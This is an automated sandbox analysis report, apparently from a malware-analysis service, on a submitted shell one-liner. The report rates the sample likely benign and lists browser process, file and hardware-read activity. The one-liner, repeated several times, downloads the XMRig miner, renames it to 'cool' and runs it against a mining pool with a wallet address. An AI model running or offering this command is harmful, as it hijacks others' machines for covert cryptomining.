Malware Analysis Report

2024-10-16 05:32

Sample ID 240714-rmybbatepl
Target http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3
Tags
antivm
score
4/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
4/10

Threat Level: Likely benign

The file http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3 was found to be: Likely benign.

Malicious Activity Summary

antivm

Changes its process name

Checks CPU configuration

Reads CPU attributes

Enumerates kernel/hardware configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 14:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 14:19

Reported

2024-07-14 14:29

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

290s

Max time network

328s

Command Line

[xdg-open http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3]

Signatures

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A
Changes the process name, possibly in an attempt to hide itself gdbus N/A N/A
Changes the process name, possibly in an attempt to hide itself glean.dispatche N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC I/O Parent N/A N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-firefox N/A N/A
Changes the process name, possibly in an attempt to hide itself HTML5 Parser N/A N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself Backgro~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background N/A N/A
Changes the process name, possibly in an attempt to hide itself IPDL Background N/A N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread N/A N/A
Changes the process name, possibly in an attempt to hide itself Socket Thread N/A N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor N/A N/A
Changes the process name, possibly in an attempt to hide itself Netlink Monitor N/A N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog N/A N/A
Changes the process name, possibly in an attempt to hide itself JS Watchdog N/A N/A
Changes the process name, possibly in an attempt to hide itself Timer N/A N/A
Changes the process name, possibly in an attempt to hide itself Timer N/A N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs N/A N/A
Changes the process name, possibly in an attempt to hide itself BGReadURLs N/A N/A
Changes the process name, possibly in an attempt to hide itself glxtest:disk$0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Cache2 I/O N/A N/A
Changes the process name, possibly in an attempt to hide itself Cookie N/A N/A
Changes the process name, possibly in an attempt to hide itself Cookie N/A N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself StreamTrans #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself TaskCon~ller #0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher N/A N/A
Changes the process name, possibly in an attempt to hide itself Worker Launcher N/A N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself BgIOThr~Pool #1 N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself Softwar~cThread N/A N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer N/A N/A
Changes the process name, possibly in an attempt to hide itself CanvasRenderer N/A N/A
Changes the process name, possibly in an attempt to hide itself Compositor N/A N/A
Changes the process name, possibly in an attempt to hide itself Compositor N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorkerLP#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself WRWorker#0 N/A N/A
Changes the process name, possibly in an attempt to hide itself Renderer N/A N/A
Changes the process name, possibly in an attempt to hide itself Renderer N/A N/A
Changes the process name, possibly in an attempt to hide itself ImageIO N/A N/A
Changes the process name, possibly in an attempt to hide itself ImageIO N/A N/A
Changes the process name, possibly in an attempt to hide itself Permission N/A N/A
Changes the process name, possibly in an attempt to hide itself Permission N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch N/A N/A
Changes the process name, possibly in an attempt to hide itself IPC Launch N/A N/A
Changes the process name, possibly in an attempt to hide itself SandboxReporter N/A N/A
Changes the process name, possibly in an attempt to hide itself SandboxReporter N/A N/A
Changes the process name, possibly in an attempt to hide itself Breakpad Server N/A N/A
Changes the process name, possibly in an attempt to hide itself Sandbox Forked N/A N/A
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A
Changes the process name, possibly in an attempt to hide itself gdbus N/A N/A
Changes the process name, possibly in an attempt to hide itself pool-/usr/libex N/A N/A
Changes the process name, possibly in an attempt to hide itself Chroot Helper N/A N/A
Changes the process name, possibly in an attempt to hide itself gmain N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/lib/firefox/firefox N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index2/size /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/nautilus N/A
File opened for reading /sys/devices/system/cpu/cpu0/cache/index3/size /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu/present /usr/lib/firefox/firefox N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/bus/pci/devices/0000:00:06.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/usb/devices /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:00.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/uevent /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:06.0/device /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.1/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent /usr/libexec/gvfs-mtp-volume-monitor N/A
File opened for reading /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:02.0/irq /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:05.0/class /usr/lib/firefox/glxtest N/A
File opened for reading /sys/devices/system/cpu /usr/lib/firefox/firefox N/A
File opened for reading /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us /usr/lib/firefox/firefox N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.0/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:04.0/resource /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:01.3/vendor /usr/lib/firefox/glxtest N/A
File opened for reading /sys/bus/pci/devices/0000:00:03.0/class /usr/lib/firefox/glxtest N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/task/2045/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/mounts /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/1788/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/bin/dbus-daemon N/A
File opened for reading /proc/1404/attr/current /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/mountinfo /usr/libexec/gvfsd-trash N/A
File opened for reading /proc/1846/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/12 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/2315/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/1822/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/2072/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/1566/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/libexec/xdg-desktop-portal-gtk N/A
File opened for reading /proc/1624/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/2073/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/102 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/1773/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/libexec/gvfs-gphoto2-volume-monitor N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/fd/76 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/1399/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/96 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/106 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/78 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/1486/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/bin/nautilus N/A
File opened for reading /proc/self/fd/112 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/1587/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/maps /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/cgroup /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd /usr/libexec/gvfsd N/A
File opened for reading /proc/self/fd/109 /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/1949/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/fd/77 /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/task/1657/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/mountinfo /usr/lib/firefox/firefox N/A
File opened for reading /proc/filesystems /usr/lib/firefox/firefox N/A
File opened for reading /proc/self/stat /usr/lib/firefox/firefox N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/dbus-daemon N/A
File opened for reading /proc/1404/status /usr/bin/dbus-daemon N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tmpaddon /usr/lib/firefox/firefox N/A
File opened for modification /tmp/firefox/.parentlock /usr/lib/firefox/firefox N/A

Processes

/usr/bin/xdg-open

[xdg-open http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-daemon

[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/grep

[grep -q ^file://]

/usr/bin/egrep

[egrep -q ^[[:alpha:]+\.\-]+:]

/usr/local/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/local/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/sed

[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]

/usr/bin/xdg-mime

[xdg-mime query default x-scheme-handler/http]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/which

[which firefox]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/firefox

[/usr/bin/firefox http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3]

/usr/bin/which

[which /usr/bin/firefox]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/lib/firefox/glxtest

[/usr/lib/firefox/glxtest -f 13]

/usr/bin/lsb_release

[/usr/bin/lsb_release -idrc]

/usr/local/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/local/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/sbin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/libexec/xdg-desktop-portal

[/usr/libexec/xdg-desktop-portal]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -prefsLen 20597 -prefMapSize 233706 -appDir /usr/lib/firefox/browser {8a88da11-6135-4648-81e5-6aade0bde0da} 1486 true socket]

/usr/libexec/xdg-document-portal

[/usr/libexec/xdg-document-portal]

/usr/libexec/xdg-permission-store

[/usr/libexec/xdg-permission-store]

/usr/libexec/xdg-desktop-portal-gtk

[/usr/libexec/xdg-desktop-portal-gtk]

/usr/libexec/gvfsd

[/usr/libexec/gvfsd]

/usr/libexec/gvfsd-fuse

[/usr/libexec/gvfsd-fuse /root/.cache/gvfs -f -o big_writes]

/usr/libexec/dconf-service

[/usr/libexec/dconf-service]

/usr/bin/nautilus

[/usr/bin/nautilus --gapplication-service]

/usr/libexec/gvfsd-trash

[/usr/libexec/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 27824 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {b18ef169-610c-4f5d-8190-95cca1574636} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -sandboxingKind 0 -prefsLen 28524 -prefMapSize 233706 -appDir /usr/lib/firefox/browser {73985f9c-59d5-4062-b06c-c73d7be0a77b} 1486 true utility]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 26668 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {3a822cf1-252e-4119-bfaf-2a6a4b32a2b2} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 26668 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {32a30bc0-c76a-47c7-9ec2-6cf3b025a72c} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 4 -isForBrowser -prefsLen 26668 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {6c6d7a92-0c32-453e-b4f9-603ea0974ae1} 1486 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 26811 -prefMapSize 233706 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {d439d10c-32b0-4a2a-a0ee-e75ef394e8f0} 1486 true tab]

/usr/bin/gnome-keyring-daemon

[/usr/bin/gnome-keyring-daemon --start --foreground --components=secrets]

/usr/libexec/gvfs-udisks2-volume-monitor

[/usr/libexec/gvfs-udisks2-volume-monitor]

/usr/libexec/gvfs-afc-volume-monitor

[/usr/libexec/gvfs-afc-volume-monitor]

/usr/libexec/gvfs-mtp-volume-monitor

[/usr/libexec/gvfs-mtp-volume-monitor]

/usr/libexec/gvfs-gphoto2-volume-monitor

[/usr/libexec/gvfs-gphoto2-volume-monitor]

/usr/libexec/gvfs-goa-volume-monitor

[/usr/libexec/gvfs-goa-volume-monitor]

/usr/libexec/goa-daemon

[/usr/libexec/goa-daemon]

